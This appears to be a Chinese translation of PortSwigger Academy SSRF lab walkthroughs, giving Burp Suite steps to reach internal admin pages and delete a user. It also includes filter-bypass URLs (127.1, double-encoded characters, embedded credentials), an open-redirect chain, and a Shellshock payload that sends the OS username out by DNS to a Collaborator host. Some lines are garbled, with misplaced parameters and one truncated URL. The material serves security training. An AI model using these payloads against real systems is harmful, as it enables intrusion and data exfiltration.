针对本地服务器的基本 SSRF
lab
实验室:针对本地服务器的基本 SSRF |网络安全学院 (portswigger.net)
solve
- 浏览并观察您无法直接访问管理页面。
/admin - 访问产品,单击“检查库存”,在 Burp Suite 中拦截请求,并将其发送到 Burp Repeater。
- 将参数中的 URL 更改为 。这应该显示管理界面。
stockApi`http://localhost/admin` 读取 HTML 以识别要删除目标用户的 URL,即:
http://localhost/admin/delete?username=carlos- 在参数中提交此 URL,以传递 SSRF 攻击。
stockApi
针对另一个后端系统的基本 SSRF
lab
实验室:针对另一个后端系统的基本 SSRF |网络安全学院 (portswigger.net)
solve
- 访问产品,单击“检查库存”,在 Burp Suite 中拦截请求,并将其发送给 Burp Intruder。
- 单击“清除 §”,更改参数以突出显示 IP 地址的最后一个八位字节(数字),单击“添加 §”。
stockApi`http://192.168.0.1:8080/admin`1 - 切换到“有效负载”选项卡,将有效负载类型更改为“数字”,然后分别在“从”和“到”和“步长”框中输入 1、255 和 1。
- 点击“开始攻击”。
- 单击“状态”列,按状态代码升序排序。您应该会看到一个状态为 200 的条目,其中显示了一个管理界面。
- 单击此请求,将其发送到 Burp Repeater,然后将路径更改为:
stockApi`/admin/delete?username=carlos`
带外检测的盲SSRF
lab
实验室:带外检测的盲SSRF |网络安全学院 (portswigger.net)
solve
- 访问产品,在 Burp Suite 中拦截请求,并将其发送到 Burp Repeater。
- 转到“中继器”选项卡。选择 Referer 标头,右键单击并选择“插入协作者有效负载”,将原始域替换为 Burp Collaborator 生成的域。发送请求。
- 转到“协作者”选项卡,然后单击“立即投票”。如果未列出任何交互,请等待几秒钟,然后重试,因为服务器端命令是异步执行的。
- 您应该会看到一些由应用程序发起的 DNS 和 HTTP 交互,这些交互是有效负载的结果。
带有基于黑名单的输入滤波器的 SSRF
lab
实验室:带有基于黑名单的输入滤波器的 SSRF |网络安全学院 (portswigger.net)
solve
- 访问产品,单击“检查库存”,在 Burp Suite 中拦截请求,并将其发送到 Burp Repeater。
- 将参数中的 URL 更改为 并观察请求是否被阻止。
stockApi`http://127.0.0.1/` - 通过将 URL 更改为以下内容来绕过该块:
http://127.1/ - 将 URL 更改为 并观察该 URL 是否再次被阻止。
http://127.1/admin - 通过对“a”进行双 URL 编码,将其混淆为 %2561,以访问管理界面并删除目标用户。
SSRF 通过开放重定向绕过过滤器漏洞
lab
实验室:SSRF 通过开放重定向绕过过滤器漏洞 |网络安全学院 (portswigger.net)
solve
- 访问产品,单击“检查库存”,在 Burp Suite 中拦截请求,并将其发送到 Burp Repeater。
- 尝试篡改该参数,并观察无法使服务器直接向其他主机发出请求。
stockApi - 单击“下一个产品”,并观察该参数是否被放置在重定向响应的 Location 标头中,从而导致打开的重定向。
path 创建一个利用开放重定向漏洞的 URL,并重定向到管理界面,并将其输入到库存检查器上的参数中:
stockApi/product/nextProduct?path=http://192.168.0.12:8080/admin- 请注意,库存检查器会跟踪重定向并显示管理页面。
修改路径以删除目标用户:
/product/nextProduct?path=http://192.168.0.12:808
具有 Shellshock 利用的盲 SSRF
lab
实验室:具有 Shellshock 利用的盲 SSRF |网络安全学院 (portswigger.net)
solve
- 在 Burp Suite Professional 中,从 BApp 商店安装“Collaborator Everywhere”扩展程序。
- 将实验室的域添加到 Burp Suite 的目标范围,以便 Collaborator Everywhere 将它作为目标。
- 浏览网站。
- 请注意,当您加载产品页面时,它会通过 Referer 标头触发与 Burp Collaborator 的 HTTP 交互。
- 请注意,HTTP 交互在 HTTP 请求中包含 User-Agent 字符串。
- 将请求发送到产品页面以发送 Burp Intruder。
转到 Collaborator 选项卡并生成唯一的 Burp Collaborator 有效负载。将其放入以下 Shellshock 有效负载中:
() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN- 将 Burp Intruder 请求中的 User-Agent 字符串替换为包含 Collaborator 域的 Shellshock 有效负载。
- 单击“清除 §”,更改 Referer 标头,然后突出显示 IP 地址的最后一个八位字节(数字),单击“添加 §”。
http://192.168.0.1:8080`1` - 切换到“有效负载”选项卡,将有效负载类型更改为“数字”,然后分别在“从”和“到”和“步长”框中输入 1、255 和 1。
- 点击“开始攻击”。
- 攻击完成后,返回“协作者”选项卡,然后单击“立即轮询”。如果未列出任何交互,请等待几秒钟,然后重试,因为服务器端命令是异步执行的。您应该会看到由后端系统发起的 DNS 交互,该后端系统被成功的盲目 SSRF 攻击击中。操作系统用户的名称应显示在 DNS 子域中。
- 若要完成实验,请输入操作系统用户的名称。
具有基于白名单的输入滤波器的 SSRF
lab
实验室:带有基于白名单的输入滤波器的 SSRF |网络安全学院 (portswigger.net)
solve
- 访问产品,单击“检查库存”,在 Burp Suite 中拦截请求,并将其发送到 Burp Repeater。
- 将参数中的 URL 更改为 ,并观察应用程序是否正在解析 URL、提取主机名并根据白名单对其进行验证。
stockApi`http://127.0.0.1/` - 将 URL 更改为 并观察这是否被接受,这表示 URL 分析器支持嵌入式凭据。
http://username@stock.weliketoshop.net/ - 将 a 附加到用户名,并观察该 URL 现在被拒绝。
# - 双 URL 对 to 进行编码,并观察极其可疑的“内部服务器错误”响应,表明服务器可能已尝试连接到“用户名”。
#`%2523` 要访问管理界面并删除目标用户,请将 URL 更改为:
http://localhost:80%2523@stock.weliketoshop.net/admin
评论0
暂时没有评论